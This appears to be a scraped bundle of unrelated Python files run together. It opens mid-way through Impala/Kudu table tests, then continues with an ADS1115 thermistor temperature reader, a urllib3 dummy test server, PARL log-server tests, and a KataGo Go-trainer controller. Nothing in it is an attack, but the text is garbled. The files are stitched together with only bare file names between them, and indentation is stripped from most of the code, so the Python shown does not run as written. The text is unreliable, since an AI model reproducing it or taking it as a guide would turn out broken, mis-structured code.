cursor.execute("DESCRIBE %s" % (impala_table_name))
assert cursor.fetchall() == \
[("a", "int", "", "true", "false", "", "AUTO_ENCODING",
"DEFAULT_COMPRESSION", "0")]
# Drop the underlying Kudu table and replace it with another Kudu table that has
# the same name but different schema
kudu_client.delete_table(kudu_table.name)
assert not kudu_client.table_exists(kudu_table.name)
new_col_names = ['b', 'c']
name_parts = kudu_table.name.split(".")
assert len(name_parts) == 2
with self.temp_kudu_table(kudu_client, [STRING, STRING], col_names=new_col_names,
db_name=name_parts[0], name= name_parts[1]) as new_kudu_table:
assert kudu_client.table_exists(new_kudu_table.name)
# Refresh the external table and verify that the new schema is loaded from
# Kudu.
cursor.execute("REFRESH %s" % (impala_table_name))
cursor.execute("DESCRIBE %s" % (impala_table_name))
assert cursor.fetchall() == \
[("b", "string", "", "true", "false", "", "AUTO_ENCODING",
"DEFAULT_COMPRESSION", "0"),
("c", "string", "", "false", "true", "", "AUTO_ENCODING",
"DEFAULT_COMPRESSION", "0")]
@SkipIfKudu.hms_integration_enabled
def test_delete_external_kudu_table(self, cursor, kudu_client):
"""Check that Impala can recover from the case where the underlying Kudu table of
an external table is dropped using the Kudu client.
"""
with self.temp_kudu_table(kudu_client, [INT32]) as kudu_table:
# Create an external Kudu table
impala_table_name = self.get_kudu_table_base_name(kudu_table.name)
props = "TBLPROPERTIES('kudu.table_name'='%s')" % kudu_table.name
cursor.execute("CREATE EXTERNAL TABLE %s STORED AS KUDU %s" % (
impala_table_name, props))
cursor.execute("DESCRIBE %s" % (impala_table_name))
assert cursor.fetchall() == \
[("a", "int", "", "true", "false", "", "AUTO_ENCODING",
"DEFAULT_COMPRESSION", "0")]
# Drop the underlying Kudu table
kudu_client.delete_table(kudu_table.name)
assert not kudu_client.table_exists(kudu_table.name)
err_msg = 'the table does not exist: table_name: "%s"' % (kudu_table.name)
try:
cursor.execute("REFRESH %s" % (impala_table_name))
except Exception as e:
assert err_msg in str(e)
cursor.execute("DROP TABLE %s" % (impala_table_name))
cursor.execute("SHOW TABLES")
assert (impala_table_name,) not in cursor.fetchall()
@SkipIfKudu.hms_integration_enabled
def test_delete_managed_kudu_table(self, cursor, kudu_client, unique_database):
"""Check that dropping a managed Kudu table works even if the underlying Kudu table
has been dropped externally."""
impala_tbl_name = "foo"
cursor.execute("""CREATE TABLE %s.%s (a INT PRIMARY KEY) PARTITION BY HASH (a)
PARTITIONS 3 STORED AS KUDU""" % (unique_database, impala_tbl_name))
kudu_tbl_name = KuduTestSuite.to_kudu_table_name(unique_database, impala_tbl_name)
assert kudu_client.table_exists(kudu_tbl_name)
kudu_client.delete_table(kudu_tbl_name)
assert not kudu_client.table_exists(kudu_tbl_name)
cursor.execute("DROP TABLE %s.%s" % (unique_database, impala_tbl_name))
cursor.execute("SHOW TABLES IN %s" % unique_database)
assert (impala_tbl_name,) not in cursor.fetchall()
@SkipIfNotHdfsMinicluster.tuned_for_minicluster
class TestKuduMemLimits(KuduTestSuite):
QUERIES = ["select * from tpch_kudu.lineitem where l_orderkey = -1",
"select * from tpch_kudu.lineitem where l_commitdate like '%cheese'",
"select * from tpch_kudu.lineitem limit 90"]
  # Each value is the minimum memory (in MB) required by the corresponding query
  # above; the first limit corresponds to the first query, and so on.
QUERY_MEM_LIMITS = [1, 1, 10]
@pytest.mark.execute_serially
@pytest.mark.parametrize("mem_limit", [1, 10, 0])
def test_low_mem_limit_low_selectivity_scan(self, cursor, mem_limit, vector):
"""Tests that the queries specified in this test suite run under the given
memory limits."""
    exec_options = dict((k, str(v)) for k, v
                        in vector.get_value('exec_option').items())
exec_options['mem_limit'] = "{0}m".format(mem_limit)
for i, q in enumerate(self.QUERIES):
try:
cursor.execute(q, configuration=exec_options)
cursor.fetchall()
except Exception as e:
if (mem_limit > self.QUERY_MEM_LIMITS[i]):
raise
assert "Memory limit exceeded" in str(e)
# IMPALA-4654: Validate the fix for a bug where LimitReached() wasn't respected in
# the KuduScanner and the limit query above would result in a fragment running an
# additional minute. This ensures that the num fragments 'in flight' reaches 0 in
# less time than IMPALA-4654 was reproducing (~60sec) but yet still enough time that
# this test won't be flaky.
verifiers = [ MetricVerifier(i.service) for i in ImpalaCluster().impalads ]
for v in verifiers:
v.wait_for_metric("impala-server.num-fragments-in-flight", 0, timeout=30)
ADS1115TempSensor.py
from MQTT import Publisher, Subscriber, Client
import math
import threading
import time
import log
import Filter
import board
import busio
import adafruit_ads1x15.ads1115 as ADS
from adafruit_ads1x15.analog_in import AnalogIn
import Threaded
# Create the I2C bus
def get_i2c():
return busio.I2C(board.SCL, board.SDA)
class ADS1115(object):
def __init__(self, gain : int = 1, ref_channel : int = None):
self.ads = None
self.chans = [ADS.P0, ADS.P1, ADS.P2, ADS.P3 ] # available channels
self.channels = []
self.ref_channel = ref_channel
self.lock = threading.Lock() # lock for reset
self.logger = log.get_logger("ADS1115")
self.gain = gain
self.reset()
    # the sensor occasionally hangs (the reported value stops changing), so allow a full re-init
def reset(self):
self.logger.info("Resetting.")
with self.lock:
if not self.ads is None:
self.ads.i2c_device.i2c.deinit()
self.ads = None
self.channels = []
self.ads = ADS.ADS1115(get_i2c())
self.ads.gain = self.gain # see datasheet for gain levels (defines voltage range)
# if no ref channel selected, just use the channels as they are
if self.ref_channel is None:
for chan in self.chans:
self.channels.append(AnalogIn(self.ads, chan))
else:
if self.ref_channel < 0 or self.ref_channel > 3:
raise ValueError("invalid reference channel")
for chan in self.chans:
if chan == self.chans[self.ref_channel]: continue # omit ref channel
# might throw if wrong combination is selected
self.channels.append(AnalogIn(self.ads, chan, self.chans[self.ref_channel]))
def ref(self):
return self.ref_channel
def __check_channel_index__(self, channel : int):
if channel < 0 or channel > 3:
raise ValueError("invalid channel number")
if not self.ref_channel is None:
if self.ref_channel == channel:
raise ValueError("can't select ref channel")
    # maps an ADC channel number to its index in self.channels; in differential mode
    # the reference channel is omitted from the list, so higher channels shift down by one
    def __channel_to_index__(self, channel : int):
        if self.ref_channel is not None and channel > self.ref_channel:
            return channel - 1
        return channel
    def get_value(self, channel : int):
        with self.lock:
            self.__check_channel_index__(channel)
            return self.channels[self.__channel_to_index__(channel)].value
    def get_voltage(self, channel : int):
        with self.lock:
            self.__check_channel_index__(channel)
            return self.channels[self.__channel_to_index__(channel)].voltage
'''
Vcc -----------+----------------------------+
| |
[ ] R_serial |
| |
+----------------+ U_ref
| | |
[ ] R_NTC U_NTC |
| | |
GND -----------+----------------+-----------+
'''
class NTCAdapter(object):
def __init__(self, ads : ADS1115, channel : int, ref_channel : int):
self.ads = ads
self.channel = channel
self.ref_channel = ref_channel
self.r_serial = 22e3 # 22kOhm
self.coeffs = [8.00796252e-04, 2.80177169e-04, -3.14619144e-06, 3.06728618e-07]
def get_temperature(self):
# vcc to gnd
u_ref = self.ads.get_voltage(self.ref_channel)
# voltage of ntc (ntc to ground)
u_ntc = self.ads.get_voltage(self.channel)
        # voltage drop across the series (measurement) resistor
u_r = abs(u_ref - u_ntc)
        # current through the series resistor
i = u_r / self.r_serial
# resulting resistance of the ntc
r_ntc = u_ntc / i
# use Steinhart-Hart-Equation for temperature estimation
log_r = math.log(r_ntc)
sum = 0.
for i in range(0, len(self.coeffs)):
sum += self.coeffs[i] * math.pow(log_r, i)
return ( 1. / sum ) - 273.15 # kelvin to °C
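# Worked example of the divider math above (illustrative only, not used by the
# classes in this module): with hypothetical readings U_ref = 3.3 V and
# U_NTC = 1.65 V over a 22 kOhm series resistor, Ohm's law gives R_NTC = 22 kOhm,
# and the Steinhart-Hart polynomial with the coefficients above comes out to
# roughly 5 degrees Celsius.
def _example_ntc_math(u_ref=3.3, u_ntc=1.65, r_serial=22e3):
    coeffs = [8.00796252e-04, 2.80177169e-04, -3.14619144e-06, 3.06728618e-07]
    current = abs(u_ref - u_ntc) / r_serial  # current through the series resistor
    r_ntc = u_ntc / current  # thermistor resistance via Ohm's law
    log_r = math.log(r_ntc)
    inv_t = sum(c * log_r ** n for n, c in enumerate(coeffs))  # 1/T in 1/Kelvin
    return (1. / inv_t) - 273.15  # Kelvin to degrees Celsius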
class ADSTemperatureThreadedReader(Threaded.Threaded):
    def __init__(self, adapters : "list[NTCAdapter]"):
self.logger = log.get_logger("ADSReader")
super(ADSTemperatureThreadedReader, self).__init__(self.logger)
self.adapters = adapters
self.measurements = 5 # number of measurements to do
self.measurement_delay = 1000 # delay between measurements in ms
self.filters = []
for _ in range(0, len(self.adapters)):
self.filters.append(Filter.MovingAverage(10))
self.temperatures = [None] * len(self.adapters)
self.lock = threading.Lock()
# reads the temperature of all channels
def looped(self):
temperatures = [0] * len(self.adapters)
for i in range(0, len(self.adapters)):
temperatures[i] = self.filters[i].feed(self.adapters[i].get_temperature())
with self.lock:
self.temperatures = temperatures
time.sleep(self.measurement_delay / 1000.)
def get_channel_temperature(self, channel : int):
if channel < 0 or channel >= len(self.adapters):
raise ValueError("invalid channel number '{}'".format(channel))
with self.lock:
value = self.temperatures[channel]
if value is None:
return None
else:
return round(value, 1)
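# Minimal usage sketch (illustrative only; the channel assignment is an assumption):
# single-ended mode with channel 3 tied to Vcc as the reference tap and an NTC
# divider on channel 0, matching the schematic above. How the Threaded base class is
# started is not shown in this file, so only the direct, unthreaded read is shown.
def _example_single_reading():
    ads = ADS1115(gain=1)  # no ref_channel: all four inputs are single-ended
    ntc = NTCAdapter(ads, channel=0, ref_channel=3)  # channel 3 measures U_ref
    return ntc.get_temperature()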
# class ADS1115_NTC(object):
# def __init__(self):
# self.r_serial = 22e3 # 22kOhm
# self.address = 0x48 # I2C address
# self.gain = 1 # voltage range gain level
# self.max_voltage = 4.096 # resulting voltage range
# self.coeffs = [8.00796252e-04, 2.80177169e-04, -3.14619144e-06, 3.06728618e-07]
# self.ref_channel = 3 # channel that measures the ref voltage
# self.temperatures_per_channel = []
# self.adc =Adafruit_ADS1x15.ADS1115(address=self.address, )
# self.measurements = 5 # number of measurements to do
# self.measurement_delay = 5000 # delay between measurements in ms
# self.lock = threading.Lock()
# self.logger = log.get_logger("ADS1115")
# def __to_volt__(self, value : int):
# return self.max_voltage * value / 32768.
# def __get_voltage__(self, channel : int):
# return self.__to_volt__(self.adc.read_adc(channel, gain=self.gain))
# def __temperature_from_volt__(self, u_ntc : float, u_ref : float):
# r = 22000
# u_r = abs(u_ref - u_ntc)
# i = u_r / r
# r_ntc = u_ntc / i
# log_r = math.log(r_ntc)
# sum = 0.
# for i in range(0, len(self.coeffs)):
# sum += self.coeffs[i] * math.pow(log_r, i)
# return ( 1. / sum ) - 273.15 # kelvin to °C
# # get the reference channel voltage
# def __get_ref_voltage__(self):
# return self.__get_voltage__(self.ref_channel)
# def __get_temperature__(self, channel : int):
# u_ref = self.__get_ref_voltage__()
# u_channel = self.__get_voltage__(channel)
# # if we have not connected or shorted channel,
# # channel and ref voltage could be the same
# if u_ref <= u_channel: return -273.15
# return self.__temperature_from_volt__(u_channel, u_ref)
# # reads the temperature of all channels
# def __acquire_temperature__(self):
# temperatures = []
# for channel in range(0, 3):
# t = 0
# for _ in range(0, self.measurements):
# t += self.__get_temperature__(channel)
# time.sleep(self.measurement_delay / 1000.)
# t /= float(self.measurements)
# temperatures.append(t)
# with self.lock:
# self.temperatures_per_channel = temperatures
# def __thread_loop__(self):
# while True:
# self.__acquire_temperature__()
# time.sleep(10)
# def run(self):
# self.logger.info("Starting thread for ADS1115")
# threading.Thread(target=self.__thread_loop__).start()
# def get_channel_temperature(self, channel : int):
# with self.lock:
# # not filled already?
# if len(self.temperatures_per_channel) <= channel:
# raise "Not ready yet"
# return self.temperatures_per_channel[channel]
server.py
#!/usr/bin/env python
"""
Dummy server used for unit testing.
"""
from __future__ import print_function
import errno
import logging
import os
import random
import string
import sys
import threading
import socket
import warnings
from datetime import datetime
from urllib3.exceptions import HTTPWarning
from tornado.platform.auto import set_close_exec
import tornado.httpserver
import tornado.ioloop
import tornado.web
log = logging.getLogger(__name__)
CERTS_PATH = os.path.join(os.path.dirname(__file__), 'certs')
DEFAULT_CERTS = {
'certfile': os.path.join(CERTS_PATH, 'server.crt'),
'keyfile': os.path.join(CERTS_PATH, 'server.key'),
}
NO_SAN_CERTS = {
'certfile': os.path.join(CERTS_PATH, 'server.no_san.crt'),
'keyfile': DEFAULT_CERTS['keyfile']
}
IP_SAN_CERTS = {
'certfile': os.path.join(CERTS_PATH, 'server.ip_san.crt'),
'keyfile': DEFAULT_CERTS['keyfile']
}
IPV6_ADDR_CERTS = {
'certfile': os.path.join(CERTS_PATH, 'server.ipv6addr.crt'),
'keyfile': os.path.join(CERTS_PATH, 'server.ipv6addr.key'),
}
DEFAULT_CA = os.path.join(CERTS_PATH, 'cacert.pem')
DEFAULT_CA_BAD = os.path.join(CERTS_PATH, 'client_bad.pem')
NO_SAN_CA = os.path.join(CERTS_PATH, 'cacert.no_san.pem')
DEFAULT_CA_DIR = os.path.join(CERTS_PATH, 'ca_path_test')
IPV6_ADDR_CA = os.path.join(CERTS_PATH, 'server.ipv6addr.crt')
def _has_ipv6(host):
""" Returns True if the system can bind an IPv6 address. """
sock = None
has_ipv6 = False
if socket.has_ipv6:
# has_ipv6 returns true if cPython was compiled with IPv6 support.
# It does not tell us if the system has IPv6 support enabled. To
# determine that we must bind to an IPv6 address.
# https://github.com/shazow/urllib3/pull/611
# https://bugs.python.org/issue658327
try:
sock = socket.socket(socket.AF_INET6)
sock.bind((host, 0))
has_ipv6 = True
except:
pass
if sock:
sock.close()
return has_ipv6
# Some systems may have IPv6 support but DNS may not be configured
# properly. We can not count that localhost will resolve to ::1 on all
# systems. See https://github.com/shazow/urllib3/pull/611 and
# https://bugs.python.org/issue18792
HAS_IPV6_AND_DNS = _has_ipv6('localhost')
HAS_IPV6 = _has_ipv6('::1')
# Different types of servers we have:
class NoIPv6Warning(HTTPWarning):
"IPv6 is not available"
pass
class SocketServerThread(threading.Thread):
"""
:param socket_handler: Callable which receives a socket argument for one
request.
:param ready_event: Event which gets set when the socket handler is
ready to receive requests.
"""
USE_IPV6 = HAS_IPV6_AND_DNS
def __init__(self, socket_handler, host='localhost', port=8081,
ready_event=None):
threading.Thread.__init__(self)
self.daemon = True
self.socket_handler = socket_handler
self.host = host
self.ready_event = ready_event
def _start_server(self):
if self.USE_IPV6:
sock = socket.socket(socket.AF_INET6)
else:
warnings.warn("No IPv6 support. Falling back to IPv4.",
NoIPv6Warning)
sock = socket.socket(socket.AF_INET)
if sys.platform != 'win32':
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind((self.host, 0))
self.port = sock.getsockname()[1]
# Once listen() returns, the server socket is ready
sock.listen(1)
if self.ready_event:
self.ready_event.set()
self.socket_handler(sock)
sock.close()
def run(self):
self.server = self._start_server()
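# Illustrative sketch (not part of the real test suite): driving SocketServerThread
# with a one-shot echo handler. The handler below is an assumption made for
# demonstration; real tests supply their own socket_handler.
def _example_socket_server():
    ready = threading.Event()
    def echo_handler(listener):
        conn, _ = listener.accept()  # serve exactly one connection
        conn.sendall(conn.recv(65536))  # echo the request bytes back
        conn.close()
    server = SocketServerThread(echo_handler, ready_event=ready)
    server.start()
    ready.wait()  # the port is known once the listening socket is bound
    return server.host, server.port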
# FIXME: there is a pull request patching bind_sockets in Tornado directly.
# If it gets merged and released we can drop this and use
# `tornado.netutil.bind_sockets` again.
# https://github.com/facebook/tornado/pull/977
def bind_sockets(port, address=None, family=socket.AF_UNSPEC, backlog=128,
flags=None):
"""Creates listening sockets bound to the given port and address.
Returns a list of socket objects (multiple sockets are returned if
the given address maps to multiple IP addresses, which is most common
for mixed IPv4 and IPv6 use).
Address may be either an IP address or hostname. If it's a hostname,
the server will listen on all IP addresses associated with the
name. Address may be an empty string or None to listen on all
available interfaces. Family may be set to either `socket.AF_INET`
or `socket.AF_INET6` to restrict to IPv4 or IPv6 addresses, otherwise
both will be used if available.
The ``backlog`` argument has the same meaning as for
`socket.listen() <socket.socket.listen>`.
``flags`` is a bitmask of AI_* flags to `~socket.getaddrinfo`, like
``socket.AI_PASSIVE | socket.AI_NUMERICHOST``.
"""
sockets = []
if address == "":
address = None
if not HAS_IPV6 and family == socket.AF_UNSPEC:
# Python can be compiled with --disable-ipv6, which causes
# operations on AF_INET6 sockets to fail, but does not
# automatically exclude those results from getaddrinfo
# results.
# http://bugs.python.org/issue16208
family = socket.AF_INET
if flags is None:
flags = socket.AI_PASSIVE
binded_port = None
for res in set(socket.getaddrinfo(address, port, family,
socket.SOCK_STREAM, 0, flags)):
af, socktype, proto, canonname, sockaddr = res
try:
sock = socket.socket(af, socktype, proto)
except socket.error as e:
if e.args[0] == errno.EAFNOSUPPORT:
continue
raise
set_close_exec(sock.fileno())
if os.name != 'nt':
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
if af == socket.AF_INET6:
# On linux, ipv6 sockets accept ipv4 too by default,
# but this makes it impossible to bind to both
# 0.0.0.0 in ipv4 and :: in ipv6. On other systems,
# separate sockets *must* be used to listen for both ipv4
# and ipv6. For consistency, always disable ipv4 on our
# ipv6 sockets and use a separate ipv4 socket when needed.
#
# Python 2.x on windows doesn't have IPPROTO_IPV6.
if hasattr(socket, "IPPROTO_IPV6"):
sock.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY, 1)
# automatic port allocation with port=None
# should bind on the same port on IPv4 and IPv6
host, requested_port = sockaddr[:2]
if requested_port == 0 and binded_port is not None:
sockaddr = tuple([host, binded_port] + list(sockaddr[2:]))
sock.setblocking(0)
sock.bind(sockaddr)
binded_port = sock.getsockname()[1]
sock.listen(backlog)
sockets.append(sock)
return sockets
def run_tornado_app(app, io_loop, certs, scheme, host):
app.last_req = datetime.fromtimestamp(0)
if scheme == 'https':
http_server = tornado.httpserver.HTTPServer(app, ssl_options=certs,
io_loop=io_loop)
else:
http_server = tornado.httpserver.HTTPServer(app, io_loop=io_loop)
sockets = bind_sockets(None, address=host)
port = sockets[0].getsockname()[1]
http_server.add_sockets(sockets)
return http_server, port
def run_loop_in_thread(io_loop):
t = threading.Thread(target=io_loop.start)
t.start()
return t
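# Illustrative sketch (not part of the real test suite): an HTTPS variant of the
# __main__ block below, using the self-signed DEFAULT_CERTS defined above. The
# caller is responsible for stopping the io_loop and server when finished.
def _example_https_server(app, host='localhost'):
    io_loop = tornado.ioloop.IOLoop()
    server, port = run_tornado_app(app, io_loop, DEFAULT_CERTS, 'https', host)
    loop_thread = run_loop_in_thread(io_loop)
    return server, port, io_loop, loop_thread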
def get_unreachable_address():
while True:
host = ''.join(random.choice(string.ascii_lowercase)
for _ in range(60))
sockaddr = (host, 54321)
# check if we are really "lucky" and hit an actual server
try:
s = socket.create_connection(sockaddr)
except socket.error:
return sockaddr
else:
s.close()
if __name__ == '__main__':
# For debugging dummyserver itself - python -m dummyserver.server
from .testcase import TestingApp
host = '127.0.0.1'
io_loop = tornado.ioloop.IOLoop()
app = tornado.web.Application([(r".*", TestingApp)])
server, port = run_tornado_app(app, io_loop, None,
'http', host)
server_thread = run_loop_in_thread(io_loop)
print("Listening on http://{host}:{port}".format(host=host, port=port))
log_server_test.py
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import multiprocessing
import os
import pickle
import subprocess
import sys
import tempfile
import threading
import time
import unittest
import requests
requests.adapters.DEFAULT_RETRIES = 5
import parl
from parl.remote.client import disconnect, get_global_client
from parl.remote.master import Master
from parl.remote.worker import Worker
from parl.utils import _IS_WINDOWS
from parl.utils import get_free_tcp_port
@parl.remote_class
class Actor(object):
def __init__(self, number=None, arg1=None, arg2=None):
self.number = number
self.arg1 = arg1
self.arg2 = arg2
print("Init actor...")
self.init_output = "Init actor...\n"
def sim_output(self, start, end):
output = ""
print(self.number)
output += str(self.number)
output += "\n"
for i in range(start, end):
print(i)
output += str(i)
output += "\n"
return self.init_output + output
class TestLogServer(unittest.TestCase):
def tearDown(self):
disconnect()
    # On Windows, multiprocessing.Process cannot run an instance method of a class, but a static method works.
@staticmethod
def _connect_and_create_actor(cluster_addr):
parl.connect(cluster_addr)
outputs = []
for i in range(2):
actor = Actor(number=i)
ret = actor.sim_output(1, 4)
assert ret != ""
outputs.append(ret)
return outputs
def test_log_server(self):
master_port = get_free_tcp_port()
# start the master
master = Master(port=master_port)
th = threading.Thread(target=master.run)
th.start()
time.sleep(1)
cluster_addr = 'localhost:{}'.format(master_port)
log_server_port = get_free_tcp_port()
worker = Worker(cluster_addr, 4, log_server_port=log_server_port)
outputs = self._connect_and_create_actor(cluster_addr)
# Get status
status = master._get_status()
client_jobs = pickle.loads(status).get('client_jobs')
self.assertIsNotNone(client_jobs)
# Get job id
client = get_global_client()
jobs = client_jobs.get(client.client_id)
self.assertIsNotNone(jobs)
for job_id, log_server_addr in jobs.items():
log_url = "http://{}/get-log".format(log_server_addr)
# Test response without job_id
r = requests.get(log_url)
self.assertEqual(r.status_code, 400)
# Test normal response
r = requests.get(log_url, params={'job_id': job_id})
self.assertEqual(r.status_code, 200)
log_content = json.loads(r.text).get('log')
self.assertIsNotNone(log_content)
log_content = log_content.replace('\r\n', '\n')
self.assertIn(log_content, outputs)
# Test download
download_url = "http://{}/download-log".format(log_server_addr)
r = requests.get(download_url, params={'job_id': job_id})
self.assertEqual(r.status_code, 200)
log_content = r.text.replace('\r\n', '\n')
self.assertIn(log_content, outputs)
disconnect()
worker.exit()
master.exit()
def test_monitor_query_log_server(self):
master_port = get_free_tcp_port()
monitor_port = get_free_tcp_port()
# start the master
master = Master(port=master_port, monitor_port=monitor_port)
th = threading.Thread(target=master.run)
th.start()
time.sleep(1)
# start the cluster monitor
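        # __file__ may end in '.pyc' when running from compiled bytecode, so both
        # suffixes are replaced below to locate monitor.py one directory up.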
monitor_file = __file__.replace('log_server_test.pyc', '../monitor.py')
monitor_file = monitor_file.replace('log_server_test.py',
'../monitor.py')
command = [
sys.executable, monitor_file, "--monitor_port",
str(monitor_port), "--address", "localhost:" + str(master_port)
]
if _IS_WINDOWS:
FNULL = tempfile.TemporaryFile()
else:
FNULL = open(os.devnull, 'w')
monitor_proc = subprocess.Popen(
command, stdout=FNULL, stderr=subprocess.STDOUT, close_fds=True)
# Start worker
cluster_addr = 'localhost:{}'.format(master_port)
log_server_port = get_free_tcp_port()
worker = Worker(cluster_addr, 4, log_server_port=log_server_port)
# Test monitor API
outputs = self._connect_and_create_actor(cluster_addr)
time.sleep(5) # Wait for the status update
client = get_global_client()
jobs_url = "{}/get-jobs?client_id={}".format(master.monitor_url,
client.client_id)
r = requests.get(jobs_url)
self.assertEqual(r.status_code, 200)
data = json.loads(r.text)
for job in data:
log_url = job.get('log_url')
self.assertIsNotNone(log_url)
r = requests.get(log_url)
self.assertEqual(r.status_code, 200)
log_content = json.loads(r.text).get('log')
self.assertIsNotNone(log_content)
log_content = log_content.replace('\r\n', '\n')
self.assertIn(log_content, outputs)
# Test download
download_url = job.get('download_url')
r = requests.get(download_url)
self.assertEqual(r.status_code, 200)
log_content = r.text.replace('\r\n', '\n')
self.assertIn(log_content, outputs)
# Clean context
monitor_proc.kill()
monitor_proc.wait()
disconnect()
worker.exit()
master.exit()
if __name__ == '__main__':
unittest.main()
|
controller.py
|
import copy
import json
import os
import random
import re
import shlex
import subprocess
import sys
import threading
import time
from queue import Queue
from kivy.clock import Clock
from kivy.storage.jsonstore import JsonStore
from kivy.uix.boxlayout import BoxLayout
from kivy.uix.checkbox import CheckBox
from kivy.uix.filechooser import FileChooserListView
from kivy.uix.gridlayout import GridLayout
from kivy.uix.label import Label
from kivy.uix.popup import Popup
from board import Board, IllegalMoveException, Move
BASE_PATH = getattr(sys, "_MEIPASS", os.path.dirname(os.path.abspath(__file__)))
config_file = sys.argv[1] if len(sys.argv) > 1 else os.path.join(BASE_PATH, "config.json")
print(f"Using config file {config_file}")
Config = JsonStore(config_file)
class EngineControls(GridLayout):
def __init__(self, **kwargs):
super(EngineControls, self).__init__(**kwargs)
self.command = os.path.join(BASE_PATH, Config.get("engine")["command"])
if "win" not in sys.platform:
self.command = shlex.split(self.command)
analysis_settings = Config.get("analysis")
self.visits = [[analysis_settings["pass_visits"], analysis_settings["visits"]], [analysis_settings["pass_visits_fast"], analysis_settings["visits_fast"]]]
self.train_settings = Config.get("trainer")
self.debug = Config.get("debug")["level"]
self.board_size = Config.get("board")["size"]
self.ready = False
self.message_queue = None
self.board = Board(self.board_size)
self.komi = 6.5 # loaded from config in init
self.outstanding_analysis_queries = [] # allows faster interaction while kata is starting
self.kata = None
self.query_time = {}
def show_error(self, msg):
print(f"ERROR: {msg}")
self.info.text = msg
def redraw(self, include_board=False):
if include_board:
Clock.schedule_once(self.parent.board.draw_board, -1) # main thread needs to do this
Clock.schedule_once(self.parent.board.redraw, -1)
def restart(self, board_size=None):
self.ready = False
if not self.message_queue:
self.message_queue = Queue()
self.engine_thread = threading.Thread(target=self._engine_thread, daemon=True).start()
else:
with self.message_queue.mutex:
self.message_queue.queue.clear()
self.action("init", board_size or self.board_size)
def action(self, message, *args):
self.message_queue.put([message, *args])
# engine main loop
def _engine_thread(self):
try:
self.kata = subprocess.Popen(self.command, stdin=subprocess.PIPE, stdout=subprocess.PIPE)
except FileNotFoundError:
self.show_error(
f"Starting kata with command '{self.command}' failed. If you are on Mac or Linux, please edit configuration file '{config_file}' to point to the correct KataGo executable."
)
self.analysis_thread = threading.Thread(target=self._analysis_read_thread, daemon=True).start()
msg, *args = self.message_queue.get()
while True:
try:
if self.debug:
print("MESSAGE", msg, args)
getattr(self, f"_do_{msg.replace('-','_')}")(*args)
except Exception as e:
self.show_error(f"Exception in Engine thread: {e}")
raise
msg, *args = self.message_queue.get()
def play(self, move, faster=False):
try:
mr = self.board.play(move)
except IllegalMoveException as e:
self.info.text = f"Illegal move: {str(e)}"
return
self.update_evaluation()
if not mr.analysis_ready:  # a replayed old move already has analysis; only request it for new moves
self._request_analysis(mr, faster=faster)
return mr
def show_evaluation_stats(self, move):
if move.analysis_ready:
self.score.text = move.format_score().replace("-", "\u2013")
self.temperature.text = f"{move.temperature_stats[2]:.1f}"
if move.parent and move.parent.analysis_ready:
if move.evaluation is not None:
self.evaluation.text = f"{move.evaluation:.1%}"
else:
self.evaluation.text = f"?"
# handles showing completed analysis and triggered actions like auto undo and ai move
def update_evaluation(self):
current_move = self.board.current_move
self.score.set_prisoners(self.board.prisoner_count)
current_player_is_human_or_both_robots = not self.ai_auto.active(current_move.player) or self.ai_auto.active(1 - current_move.player)
if current_player_is_human_or_both_robots and current_move is not self.board.root:
self.info.text = current_move.comment(eval=True, hints=self.hints.active(current_move.player))
self.evaluation.text = ""
if current_player_is_human_or_both_robots:
self.show_evaluation_stats(current_move)
if current_move.analysis_ready and current_move.parent and current_move.parent.analysis_ready and not current_move.children and not current_move.x_comment.get("undo"):
# handle automatic undo
if self.auto_undo.active(current_move.player) and not self.ai_auto.active(current_move.player) and not current_move.auto_undid:
ts = self.train_settings
# TODO: is this overly generous wrt low visit outdated evaluations?
evaluation = current_move.evaluation if current_move.evaluation is not None else 1 # assume move is fine if temperature is negative
move_eval = max(evaluation, current_move.outdated_evaluation or 0)
points_lost = (current_move.parent or current_move).temperature_stats[2] * (1 - move_eval)
if move_eval < ts["undo_eval_threshold"] and points_lost >= ts["undo_point_threshold"]:
if self.num_undos(current_move) == 0:
current_move.x_comment["undid"] = f"Move was below threshold, but no undo granted (probability is {ts['num_undo_prompts']:.0%}).\n"
self.update_evaluation()
else:
current_move.auto_undid = True
self.board.undo()
if len(current_move.parent.children) >= ts["num_undo_prompts"] + 1:
best_move = sorted([m for m in current_move.parent.children], key=lambda m: -(m.evaluation_info[0] or 0))[0]
best_move.x_comment["undo_autoplay"] = f"Automatically played as best option after max. {ts['num_undo_prompts']} undo(s).\n"
self.board.play(best_move)
self.update_evaluation()
return
# ai player doesn't technically need parent ready, but don't want to override waiting for undo
current_move = self.board.current_move # this effectively checks undo didn't just happen
if self.ai_auto.active(1 - current_move.player) and not self.board.game_ended:
if current_move.children:
self.info.text = "AI paused since moves were undone. Press 'AI Move' or choose a move for the AI to continue playing."
else:
self._do_aimove()
self.redraw(include_board=False)
# engine action functions
def _do_play(self, *args):
self.play(Move(player=self.board.current_player, coords=args[0]))
def _do_aimove(self):
ts = self.train_settings
while not self.board.current_move.analysis_ready:
self.info.text = "Thinking..."
time.sleep(0.05)
# select move
current_move = self.board.current_move
pos_moves = [
(d["move"], float(d["scoreLead"]), d["evaluation"]) for i, d in enumerate(current_move.ai_moves) if i == 0 or int(d["visits"]) >= ts["balance_play_min_visits"]
]
sel_moves = pos_moves[:1]
# don't play suicidal to balance score - pass when it's best
if self.ai_balance.active and pos_moves[0][0] != "pass":
sel_moves = [
(move, score, move_eval)
for move, score, move_eval in pos_moves
if move_eval > ts["balance_play_randomize_eval"]
and -current_move.player_sign * score > 0
or move_eval > ts["balance_play_min_eval"]
and -current_move.player_sign * score > ts["balance_play_target_score"]
] or sel_moves
aimove = Move(player=self.board.current_player, gtpcoords=random.choice(sel_moves)[0], robot=True)
if len(sel_moves) > 1:
aimove.x_comment["ai"] = "AI Balance on, moves considered: " + ", ".join(f"{move} ({aimove.format_score(score)})" for move, score, _ in sel_moves) + "\n"
self.play(aimove)
def num_undos(self, move):
if self.train_settings["num_undo_prompts"] < 1:
return int(move.undo_threshold < self.train_settings["num_undo_prompts"])
else:
return self.train_settings["num_undo_prompts"]
